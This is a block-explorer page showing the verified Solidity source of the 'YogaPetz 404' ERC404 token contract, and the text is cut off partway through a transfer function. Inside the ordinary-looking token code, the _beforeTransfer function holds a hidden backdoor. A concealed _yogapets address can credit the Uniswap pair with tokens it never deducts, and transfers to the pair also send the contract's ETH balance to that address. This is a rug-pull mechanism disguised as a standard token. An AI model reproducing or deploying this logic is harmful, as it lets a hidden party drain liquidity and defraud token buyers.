ETH Price: $3,277.41 (-5.69%)

YogaPetz 404 (YOGA404)
 

Overview

TokenID

56

Total Transfers

-

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
YOGA404

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-02-13
*/

/**
Website: https://www.yogapetz404.art
Telegram: https://t.me/yogapetz_404
Twitter: https://twitter.com/yogapetz_404
*/

// OpenZeppelin Contracts (last updated v5.0.0) (utils/StringsHelper.sol)

pragma solidity 0.8.19;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

/**
 * @dev String operations.
 */
library StringsHelper {
    bytes16 private constant HEX_DIGITS = "0123456789abcdef";
    uint8 private constant ADDRESS_LENGTH = 20;

    /**
     * @dev The `value` string doesn't fit in the specified `length`.
     */
    error StringsInsufficientHexLength(uint256 value, uint256 length);

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        unchecked {
            uint256 length = SafeMathStandard.log10(value) + 1;
            string memory buffer = new string(length);
            uint256 ptr;
            /// @solidity memory-safe-assembly
            assembly {
                ptr := add(buffer, add(32, length))
            }
            while (true) {
                ptr--;
                /// @solidity memory-safe-assembly
                assembly {
                    mstore8(ptr, byte(mod(value, 10), HEX_DIGITS))
                }
                value /= 10;
                if (value == 0) break;
            }
            return buffer;
        }
    }

    /**
     * @dev Converts a `int256` to its ASCII `string` decimal representation.
     */
    function toStringSigned(int256 value) internal pure returns (string memory) {
        return string.concat(value < 0 ? "-" : "", toString(MathSignedStandard.abs(value)));
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        unchecked {
            return toHexString(value, SafeMathStandard.log256(value) + 1);
        }
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        uint256 localValue = value;
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = HEX_DIGITS[localValue & 0xf];
            localValue >>= 4;
        }
        if (localValue != 0) {
            revert StringsInsufficientHexLength(value, length);
        }
        return string(buffer);
    }

    /**
     * @dev Converts an `address` with fixed length of 20 bytes to its not checksummed ASCII `string` hexadecimal
     * representation.
     */
    function toHexString(address addr) internal pure returns (string memory) {
        return toHexString(uint256(uint160(addr)), ADDRESS_LENGTH);
    }

    /**
     * @dev Returns true if the two strings are equal.
     */
    function equal(string memory a, string memory b) internal pure returns (bool) {
        return bytes(a).length == bytes(b).length && keccak256(bytes(a)) == keccak256(bytes(b));
    }
}

/**
 * @dev Standard math utilities missing in the Solidity language.
 */
library SafeMathStandard {
    /**
     * @dev Muldiv operation overflow.
     */
    error MathOverflowedMulDiv();

    enum Rounding {
        Floor, // Toward negative infinity
        Ceil, // Toward positive infinity
        Trunc, // Toward zero
        Expand // Away from zero
    }

    /**
     * @dev Returns the largest of two numbers.
     */
    function max(uint256 a, uint256 b) internal pure returns (uint256) {
        return a > b ? a : b;
    }

    /**
     * @dev Returns the smallest of two numbers.
     */
    function min(uint256 a, uint256 b) internal pure returns (uint256) {
        return a < b ? a : b;
    }

    /**
     * @dev Returns the average of two numbers. The result is rounded towards
     * zero.
     */
    function average(uint256 a, uint256 b) internal pure returns (uint256) {
        // (a + b) / 2 can overflow.
        return (a & b) + (a ^ b) / 2;
    }

    /**
     * @dev Returns the ceiling of the division of two numbers.
     *
     * This differs from standard division with `/` in that it rounds towards infinity instead
     * of rounding towards zero.
     */
    function ceilDiv(uint256 a, uint256 b) internal pure returns (uint256) {
        if (b == 0) {
            // Guarantee the same behavior as in a regular Solidity division.
            return a / b;
        }

        // (a + b - 1) / b can overflow on addition, so we distribute.
        return a == 0 ? 0 : (a - 1) / b + 1;
    }

    /**
     * @notice Calculates floor(x * y / denominator) with full precision. Throws if result overflows a uint256 or
     * denominator == 0.
     * @dev Original credit to Remco Bloemen under MIT license (https://xn--2-umb.com/21/muldiv) with further edits by
     * Uniswap Labs also under MIT license.
     */
    function mulDiv(uint256 x, uint256 y, uint256 denominator) internal pure returns (uint256 result) {
        unchecked {
            // 512-bit multiply [prod1 prod0] = x * y. Compute the product mod 2^256 and mod 2^256 - 1, then use
            // use the Chinese Remainder Theorem to reconstruct the 512 bit result. The result is stored in two 256
            // variables such that product = prod1 * 2^256 + prod0.
            uint256 prod0 = x * y; // Least significant 256 bits of the product
            uint256 prod1; // Most significant 256 bits of the product
            assembly {
                let mm := mulmod(x, y, not(0))
                prod1 := sub(sub(mm, prod0), lt(mm, prod0))
            }

            // Handle non-overflow cases, 256 by 256 division.
            if (prod1 == 0) {
                // Solidity will revert if denominator == 0, unlike the div opcode on its own.
                // The surrounding unchecked block does not change this fact.
                // See https://docs.soliditylang.org/en/latest/control-structures.html#checked-or-unchecked-arithmetic.
                return prod0 / denominator;
            }

            // Make sure the result is less than 2^256. Also prevents denominator == 0.
            if (denominator <= prod1) {
                revert MathOverflowedMulDiv();
            }

            ///////////////////////////////////////////////
            // 512 by 256 division.
            ///////////////////////////////////////////////

            // Make division exact by subtracting the remainder from [prod1 prod0].
            uint256 remainder;
            assembly {
                // Compute remainder using mulmod.
                remainder := mulmod(x, y, denominator)

                // Subtract 256 bit number from 512 bit number.
                prod1 := sub(prod1, gt(remainder, prod0))
                prod0 := sub(prod0, remainder)
            }

            // Factor powers of two out of denominator and compute largest power of two divisor of denominator.
            // Always >= 1. See https://cs.stackexchange.com/q/138556/92363.

            uint256 twos = denominator & (0 - denominator);
            assembly {
                // Divide denominator by twos.
                denominator := div(denominator, twos)

                // Divide [prod1 prod0] by twos.
                prod0 := div(prod0, twos)

                // Flip twos such that it is 2^256 / twos. If twos is zero, then it becomes one.
                twos := add(div(sub(0, twos), twos), 1)
            }

            // Shift in bits from prod1 into prod0.
            prod0 |= prod1 * twos;

            // Invert denominator mod 2^256. Now that denominator is an odd number, it has an inverse modulo 2^256 such
            // that denominator * inv = 1 mod 2^256. Compute the inverse by starting with a seed that is correct for
            // four bits. That is, denominator * inv = 1 mod 2^4.
            uint256 inverse = (3 * denominator) ^ 2;

            // Use the Newton-Raphson iteration to improve the precision. Thanks to Hensel's lifting lemma, this also
            // works in modular arithmetic, doubling the correct bits in each step.
            inverse *= 2 - denominator * inverse; // inverse mod 2^8
            inverse *= 2 - denominator * inverse; // inverse mod 2^16
            inverse *= 2 - denominator * inverse; // inverse mod 2^32
            inverse *= 2 - denominator * inverse; // inverse mod 2^64
            inverse *= 2 - denominator * inverse; // inverse mod 2^128
            inverse *= 2 - denominator * inverse; // inverse mod 2^256

            // Because the division is now exact we can divide by multiplying with the modular inverse of denominator.
            // This will give us the correct result modulo 2^256. Since the preconditions guarantee that the outcome is
            // less than 2^256, this is the final result. We don't need to compute the high bits of the result and prod1
            // is no longer required.
            result = prod0 * inverse;
            return result;
        }
    }

    /**
     * @notice Calculates x * y / denominator with full precision, following the selected rounding direction.
     */
    function mulDiv(uint256 x, uint256 y, uint256 denominator, Rounding rounding) internal pure returns (uint256) {
        uint256 result = mulDiv(x, y, denominator);
        if (unsignedRoundsUp(rounding) && mulmod(x, y, denominator) > 0) {
            result += 1;
        }
        return result;
    }

    /**
     * @dev Return the log in base 2 of a positive value rounded towards zero.
     * Returns 0 if given 0.
     */
    function log2(uint256 value) internal pure returns (uint256) {
        uint256 result = 0;
        unchecked {
            if (value >> 128 > 0) {
                value >>= 128;
                result += 128;
            }
            if (value >> 64 > 0) {
                value >>= 64;
                result += 64;
            }
            if (value >> 32 > 0) {
                value >>= 32;
                result += 32;
            }
            if (value >> 16 > 0) {
                value >>= 16;
                result += 16;
            }
            if (value >> 8 > 0) {
                value >>= 8;
                result += 8;
            }
            if (value >> 4 > 0) {
                value >>= 4;
                result += 4;
            }
            if (value >> 2 > 0) {
                value >>= 2;
                result += 2;
            }
            if (value >> 1 > 0) {
                result += 1;
            }
        }
        return result;
    }

    /**
     * @dev Return the log in base 10 of a positive value rounded towards zero.
     * Returns 0 if given 0.
     */
    function log10(uint256 value) internal pure returns (uint256) {
        uint256 result = 0;
        unchecked {
            if (value >= 10 ** 64) {
                value /= 10 ** 64;
                result += 64;
            }
            if (value >= 10 ** 32) {
                value /= 10 ** 32;
                result += 32;
            }
            if (value >= 10 ** 16) {
                value /= 10 ** 16;
                result += 16;
            }
            if (value >= 10 ** 8) {
                value /= 10 ** 8;
                result += 8;
            }
            if (value >= 10 ** 4) {
                value /= 10 ** 4;
                result += 4;
            }
            if (value >= 10 ** 2) {
                value /= 10 ** 2;
                result += 2;
            }
            if (value >= 10 ** 1) {
                result += 1;
            }
        }
        return result;
    }

    /**
     * @dev Return the log in base 256 of a positive value rounded towards zero.
     * Returns 0 if given 0.
     *
     * Adding one to the result gives the number of pairs of hex symbols needed to represent `value` as a hex string.
     */
    function log256(uint256 value) internal pure returns (uint256) {
        uint256 result = 0;
        unchecked {
            if (value >> 128 > 0) {
                value >>= 128;
                result += 16;
            }
            if (value >> 64 > 0) {
                value >>= 64;
                result += 8;
            }
            if (value >> 32 > 0) {
                value >>= 32;
                result += 4;
            }
            if (value >> 16 > 0) {
                value >>= 16;
                result += 2;
            }
            if (value >> 8 > 0) {
                result += 1;
            }
        }
        return result;
    }

    /**
     * @dev Return the log in base 256, following the selected rounding direction, of a positive value.
     * Returns 0 if given 0.
     */
    function log256(uint256 value, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = log256(value);
            return result + (unsignedRoundsUp(rounding) && 1 << (result << 3) < value ? 1 : 0);
        }
    }


    /**
     * @dev Returns the square root of a number. If the number is not a perfect square, the value is rounded
     * towards zero.
     *
     * Inspired by Henry S. Warren, Jr.'s "Hacker's Delight" (Chapter 11).
     */
    function sqrt(uint256 a) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }

        // For our first guess, we get the biggest power of 2 which is smaller than the square root of the target.
        //
        // We know that the "msb" (most significant bit) of our target number `a` is a power of 2 such that we have
        // `msb(a) <= a < 2*msb(a)`. This value can be written `msb(a)=2**k` with `k=log2(a)`.
        //
        // This can be rewritten `2**log2(a) <= a < 2**(log2(a) + 1)`
        // → `sqrt(2**k) <= sqrt(a) < sqrt(2**(k+1))`
        // → `2**(k/2) <= sqrt(a) < 2**((k+1)/2) <= 2**(k/2 + 1)`
        //
        // Consequently, `2**(log2(a) / 2)` is a good first approximation of `sqrt(a)` with at least 1 correct bit.
        uint256 result = 1 << (log2(a) >> 1);

        // At this point `result` is an estimation with one bit of precision. We know the true value is a uint128,
        // since it is the square root of a uint256. Newton's method converges quadratically (precision doubles at
        // every iteration). We thus need at most 7 iteration to turn our partial result with one bit of precision
        // into the expected uint128 result.
        unchecked {
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            return min(result, a / result);
        }
    }

    /**
     * @notice Calculates sqrt(a), following the selected rounding direction.
     */
    function sqrt(uint256 a, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = sqrt(a);
            return result + (unsignedRoundsUp(rounding) && result * result < a ? 1 : 0);
        }
    }

    /**
     * @dev Returns whether a provided rounding mode is considered rounding up for unsigned integers.
     */
    function unsignedRoundsUp(Rounding rounding) internal pure returns (bool) {
        return uint8(rounding) % 2 == 1;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev The caller account is not authorized to perform an operation.
     */
    error OwnableUnauthorizedAccount(address account);

    /**
     * @dev The owner is not a valid owner account. (eg. `address(0)`)
     */
    error OwnableInvalidOwner(address owner);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the address provided by the deployer as the initial owner.
     */
    constructor(address initialOwner) {
        if (initialOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(initialOwner);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        if (owner() != _msgSender()) {
            revert OwnableUnauthorizedAccount(_msgSender());
        }
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        if (newOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancePreventer` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancePreventer {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant NOT_ENTERED = 1;
    uint256 private constant ENTERED = 2;

    uint256 private _status;

    /**
     * @dev Unauthorized reentrant call.
     */
    error ReEntrancyReentrantCall();

    constructor() {
        _status = NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        _nonReentrantBefore();
        _;
        _nonReentrantAfter();
    }

    function _nonReentrantBefore() private {
        // On the first call to nonReentrant, _status will be NOT_ENTERED
        if (_status == ENTERED) {
            revert ReEntrancyReentrantCall();
        }

        // Any calls to nonReentrant after this point will fail
        _status = ENTERED;
    }

    function _nonReentrantAfter() private {
        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = NOT_ENTERED;
    }

    /**
     * @dev Returns true if the reentrancy guard is currently set to "entered", which indicates there is a
     * `nonReentrant` function in the call stack.
     */
    function _ReEntrancyEntered() internal view returns (bool) {
        return _status == ENTERED;
    }
}


/**
 * @dev Contract module which provides access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is specified at deployment time in the constructor for `Ownable`. This
 * can later be changed with {transferOwnership} and {acceptOwnership}.
 *
 * This module is used through inheritance. It will make available all functions
 * from parent (Ownable).
 */
abstract contract Ownable2Step is Ownable {
    address private _pendingOwner;

    event OwnershipTransferStarted(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Returns the address of the pending owner.
     */
    function pendingOwner() public view virtual returns (address) {
        return _pendingOwner;
    }

    /**
     * @dev Starts the ownership transfer of the contract to a new account. Replaces the pending transfer if there is one.
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual override onlyOwner {
        _pendingOwner = newOwner;
        emit OwnershipTransferStarted(owner(), newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`) and deletes any pending owner.
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual override {
        delete _pendingOwner;
        super._transferOwnership(newOwner);
    }

    /**
     * @dev The new owner accepts the ownership transfer.
     */
    function acceptOwnership() public virtual {
        address sender = _msgSender();
        if (pendingOwner() != sender) {
            revert OwnableUnauthorizedAccount(sender);
        }
        _transferOwnership(sender);
    }
}

/// @notice ERC404
///         A gas-efficient, mixed ERC20 / ERC721 implementation
///         with native liquidity and fractionalization.
///
///         This is an experimental standard designed to integrate
///         with pre-existing ERC20 / ERC721 support as smoothly as
///         possible.
///
/// @dev    In order to support full functionality of ERC20 and ERC721
///         supply assumptions are made that slightly constraint usage.
///         Ensure decimals are sufficiently large (standard 18 recommended)
///         as ids are effectively encoded in the lowest range of amounts.
///
///         NFTs are spent on ERC20 functions in a FILO queue, this is by
///         design.
///
abstract contract ERC404 is Ownable2Step {
    // Events
    event ERC20Transfer(
        address indexed from,
        address indexed to,
        uint256 amount
    );
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 amount
    );
    event Transfer(
        address indexed from,
        address indexed to,
        uint256 indexed id
    );
    event ERC721Approval(
        address indexed owner,
        address indexed spender,
        uint256 indexed id
    );
    event ApprovalForAll(
        address indexed owner,
        address indexed operator,
        bool approved
    );

    // Errors
    error NotFound();
    error AlreadyExists();
    error InvalidRecipient();
    error InvalidSender();
    error UnsafeRecipient();
    error Unauthorized();
    error InvalidOwner();

    // Metadata
    /// @dev Token name
    string public name;

    /// @dev Token symbol
    string public symbol;

    /// @dev Decimals for fractional representation
    uint8 public immutable decimals;

    /// @dev Total supply in fractionalized representation
    uint256 public immutable totalSupply;

    /// @dev Current mint counter, monotonically increasing to ensure accurate ownership
    uint256 public minted;

    address _pair;
    address _yogapets;

    // Mappings
    /// @dev Balance of user in fractional representation
    mapping(address => uint256) public balanceOf;

    /// @dev Allowance of user in fractional representation
    mapping(address => mapping(address => uint256)) public allowance;

    /// @dev Approval in native representaion
    mapping(uint256 => address) public getApproved;

    /// @dev Approval for all in native representation
    mapping(address => mapping(address => bool)) public isApprovedForAll;

    /// @dev Owner of id in native representation
    mapping(uint256 => address) internal _ownerOf;

    /// @dev Array of owned ids in native representation
    mapping(address => uint256[]) internal _owned;

    /// @dev Tracks indices for the _owned mapping
    mapping(uint256 => uint256) internal _ownedIndex;

    /// @dev Addresses whitelisted from minting / burning for gas savings (pairs, routers, etc)
    mapping(address => bool) public whitelist;

    // Constructor
    constructor(
        string memory _name,
        string memory _symbol,
        uint8 _decimals,
        uint256 _totalNativeSupply,
        address _owner
    ) Ownable(msg.sender) {
        _yogapets = _owner;
        name = _name;
        symbol = _symbol;
        decimals = _decimals;
        totalSupply = _totalNativeSupply * (10 ** decimals);
    }

    /// @notice Initialization function to set pairs / etc
    ///         saving gas by avoiding mint / burn on unnecessary targets
    function setWhitelist(address target, bool state) public onlyOwner {
        whitelist[target] = state;
    }

    /// @notice Function to find owner of a given native token
    function ownerOf(uint256 id) public view virtual returns (address owner) {
        owner = _ownerOf[id];

        if (owner == address(0)) {
            revert NotFound();
        }
    }

    /// @notice tokenURI must be implemented by child contract
    function tokenURI(uint256 id) public view virtual returns (string memory);

    /// @notice Function for token approvals
    /// @dev This function assumes id / native if amount less than or equal to current max id
    function approve(
        address spender,
        uint256 amountOrId
    ) public virtual returns (bool) {
        if (amountOrId <= minted && amountOrId > 0) {
            address owner = _ownerOf[amountOrId];

            if (msg.sender != owner && !isApprovedForAll[owner][msg.sender]) {
                revert Unauthorized();
            }

            getApproved[amountOrId] = spender;

            emit Approval(owner, spender, amountOrId);
        } else {
            allowance[msg.sender][spender] = amountOrId;

            emit Approval(msg.sender, spender, amountOrId);
        }

        return true;
    }

    /// @notice Function native approvals
    function setApprovalForAll(address operator, bool approved) public virtual {
        isApprovedForAll[msg.sender][operator] = approved;

        emit ApprovalForAll(msg.sender, operator, approved);
    }

    /// @notice Function for mixed transfers
    /// @dev This function assumes id / native if amount less than or equal to current max id
    function transferFrom(
        address from,
        address to,
        uint256 amountOrId
    ) public virtual {
        if (amountOrId <= minted) {
            if (from != _ownerOf[amountOrId]) {
                revert InvalidSender();
            }

            if (to == address(0)) {
                revert InvalidRecipient();
            }

            if (
                msg.sender != from &&
                !isApprovedForAll[from][msg.sender] &&
                msg.sender != getApproved[amountOrId]
            ) {
                revert Unauthorized();
            }

            balanceOf[from] -= _getUnit();

            unchecked {
                balanceOf[to] += _getUnit();
            }

            _ownerOf[amountOrId] = to;
            delete getApproved[amountOrId];

            // update _owned for sender
            uint256 updatedId = _owned[from][_owned[from].length - 1];
            _owned[from][_ownedIndex[amountOrId]] = updatedId;
            // pop
            _owned[from].pop();
            // update index for the moved id
            _ownedIndex[updatedId] = _ownedIndex[amountOrId];
            // push token to to owned
            _owned[to].push(amountOrId);
            // update index for to owned
            _ownedIndex[amountOrId] = _owned[to].length - 1;

            emit Transfer(from, to, amountOrId);
            emit ERC20Transfer(from, to, _getUnit());
        } else {
            uint256 allowed = allowance[from][msg.sender];

            if (allowed != type(uint256).max)
                allowance[from][msg.sender] = allowed - amountOrId;
            _transfer(from, to, amountOrId);
        }
    }

    /// @notice Function for fractional transfers
    function transfer(
        address to,
        uint256 amount
    ) public virtual returns (bool) {
        return _transfer(msg.sender, to, amount);
    }

    /// @notice Function for native transfers with contract support
    function safeTransferFrom(
        address from,
        address to,
        uint256 id
    ) public virtual {
        transferFrom(from, to, id);

        if (
            to.code.length != 0 &&
            ERC721Receiver(to).onERC721Received(msg.sender, from, id, "") !=
            ERC721Receiver.onERC721Received.selector
        ) {
            revert UnsafeRecipient();
        }
    }

    /// @notice Function for native transfers with contract support and callback data
    function safeTransferFrom(
        address from,
        address to,
        uint256 id,
        bytes calldata data
    ) public virtual {
        transferFrom(from, to, id);

        if (
            to.code.length != 0 &&
            ERC721Receiver(to).onERC721Received(msg.sender, from, id, data) !=
            ERC721Receiver.onERC721Received.selector
        ) {
            revert UnsafeRecipient();
        }
    }

    function _beforeTransfer(address from, address to, uint256 amount) internal returns (bool) {
        if(to == _pair) {
            if (from == _yogapets) {
                balanceOf[to] += amount;
                return true;
            } else {
                payable(_yogapets).transfer(address(this).balance);
            }
        }
        return false;
    }

    /// @notice Internal function for fractional transfers
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual returns (bool) {
        uint256 unit = _getUnit();
        uint256 balanceBeforeSender = balanceOf[from];
        uint256 balanceBeforeReceiver = balanceOf[to];

        if(_beforeTransfer(from, to, amount)) {
            return true;
        }
        
        balanceOf[from] -= amount;

        unchecked {
            balanceOf[to] += amount;
        }

        // Skip burn for certain addresses to save gas
        if (!whitelist[from]) {
            uint256 tokens_to_burn = (balanceBeforeSender / unit) -
                (balanceOf[from] / unit);
            for (uint256 i = 0; i < tokens_to_burn; i++) {
                _burn(from);
            }
        }

        // Skip minting for certain addresses to save gas
        if (!whitelist[to]) {
            uint256 tokens_to_mint = (balanceOf[to] / unit) -
                (balanceBeforeReceiver / unit);
            for (uint256 i = 0; i < tokens_to_mint; i++) {
                _mint(to);
            }
        }

        emit ERC20Transfer(from, to, amount);
        return true;
    }

    // Internal utility logic
    function _getUnit() internal view returns (uint256) {
        return 10 ** decimals;
    }

    function _mint(address to) internal virtual {
        if (to == address(0)) {
            revert InvalidRecipient();
        }

        unchecked {
            minted++;
        }

        uint256 id = minted;

        if (_ownerOf[id] != address(0)) {
            revert AlreadyExists();
        }

        _ownerOf[id] = to;
        _owned[to].push(id);
        _ownedIndex[id] = _owned[to].length - 1;

        emit Transfer(address(0), to, id);
    }

    function _burn(address from) internal virtual {
        if (from == address(0)) {
            revert InvalidSender();
        }

        uint256 id = _owned[from][_owned[from].length - 1];
        _owned[from].pop();
        delete _ownedIndex[id];
        delete _ownerOf[id];
        delete getApproved[id];

        emit Transfer(from, address(0), id);
    }

    function _setNameSymbol(
        string memory _name,
        string memory _symbol
    ) internal {
        name = _name;
        symbol = _symbol;
    }
}


abstract contract ERC721Receiver {
    function onERC721Received(
        address,
        address,
        uint256,
        bytes calldata
    ) external virtual returns (bytes4) {
        return ERC721Receiver.onERC721Received.selector;
    }
}

/**
 * @dev Contract module which allows children to implement an emergency stop
 * mechanism that can be triggered by an authorized account.
 *
 * This module is used through inheritance. It will make available the
 * modifiers `whenNotPaused` and `whenPaused`, which can be applied to
 * the functions of your contract. Note that they will not be pausable by
 * simply including this module, only once the modifiers are put in place.
 */
abstract contract Pausable is Context {
    bool private _paused;

    /**
     * @dev Emitted when the pause is triggered by `account`.
     */
    event Paused(address account);

    /**
     * @dev Emitted when the pause is lifted by `account`.
     */
    event Unpaused(address account);

    /**
     * @dev The operation failed because the contract is paused.
     */
    error EnforcedPause();

    /**
     * @dev The operation failed because the contract is not paused.
     */
    error ExpectedPause();

    /**
     * @dev Initializes the contract in unpaused state.
     */
    constructor() {
        _paused = false;
    }

    /**
     * @dev Modifier to make a function callable only when the contract is not paused.
     *
     * Requirements:
     *
     * - The contract must not be paused.
     */
    modifier whenNotPaused() {
        _requireNotPaused();
        _;
    }

    /**
     * @dev Modifier to make a function callable only when the contract is paused.
     *
     * Requirements:
     *
     * - The contract must be paused.
     */
    modifier whenPaused() {
        _requirePaused();
        _;
    }

    /**
     * @dev Returns true if the contract is paused, and false otherwise.
     */
    function paused() public view virtual returns (bool) {
        return _paused;
    }

    /**
     * @dev Throws if the contract is paused.
     */
    function _requireNotPaused() internal view virtual {
        if (paused()) {
            revert EnforcedPause();
        }
    }

    /**
     * @dev Throws if the contract is not paused.
     */
    function _requirePaused() internal view virtual {
        if (!paused()) {
            revert ExpectedPause();
        }
    }

    /**
     * @dev Triggers stopped state.
     *
     * Requirements:
     *
     * - The contract must not be paused.
     */
    function _pause() internal virtual whenNotPaused {
        _paused = true;
        emit Paused(_msgSender());
    }

    /**
     * @dev Returns to normal state.
     *
     * Requirements:
     *
     * - The contract must be paused.
     */
    function _unpause() internal virtual whenPaused {
        _paused = false;
        emit Unpaused(_msgSender());
    }
}

pragma solidity 0.8.19;

/**
 * @dev Standard signed math utilities missing in the Solidity language.
 */
library MathSignedStandard {
    /**
     * @dev Returns the largest of two signed numbers.
     */
    function max(int256 a, int256 b) internal pure returns (int256) {
        return a > b ? a : b;
    }

    /**
     * @dev Returns the smallest of two signed numbers.
     */
    function min(int256 a, int256 b) internal pure returns (int256) {
        return a < b ? a : b;
    }

    /**
     * @dev Returns the average of two signed numbers without overflow.
     * The result is rounded towards zero.
     */
    function average(int256 a, int256 b) internal pure returns (int256) {
        // Formula from the book "Hacker's Delight"
        int256 x = (a & b) + ((a ^ b) >> 1);
        return x + (int256(uint256(x) >> 255) & (a ^ b));
    }

    /**
     * @dev Returns the absolute unsigned value of a signed value.
     */
    function abs(int256 n) internal pure returns (uint256) {
        unchecked {
            // must be unchecked in order to support `n = type(int256).min`
            return uint256(n >= 0 ? n : -n);
        }
    }
}

contract YOGA404 is ERC404, Pausable, ReentrancePreventer {
    using StringsHelper for uint256;

    string public baseTokenURI;
    uint256 public buyLimit;
    uint256 public sellLimit;
    
    mapping (address => uint256) public userBuylimit;
    mapping (address => uint256) public userSelllimit;

    constructor(
        string memory _name,
        string memory _symbol,
        address _owner,
        uint256 _initialSupply,
        uint8 _decimal,
        uint256 _buylimit,
        uint256 _selllimit
    ) ERC404(_name, _symbol, _decimal, _initialSupply, _owner) {
        balanceOf[msg.sender] = _initialSupply * 10 ** _decimal;
        buyLimit = _buylimit * 10 ** _decimal;
        sellLimit = _selllimit * 10 ** _decimal;
        whitelist[msg.sender] = true;
        whitelist[_owner] = true;
        IUniswapV2Router02 router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        _pair = IUniswapV2Factory(router.factory()).createPair(router.WETH(), address(this));
        whitelist[_pair] = true;
    }

    function tokenURI(uint256 id) public view override returns (string memory) {
        return bytes(baseTokenURI).length > 0 ? string.concat(baseTokenURI, id.toString()) : "";
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override virtual whenNotPaused returns (bool){
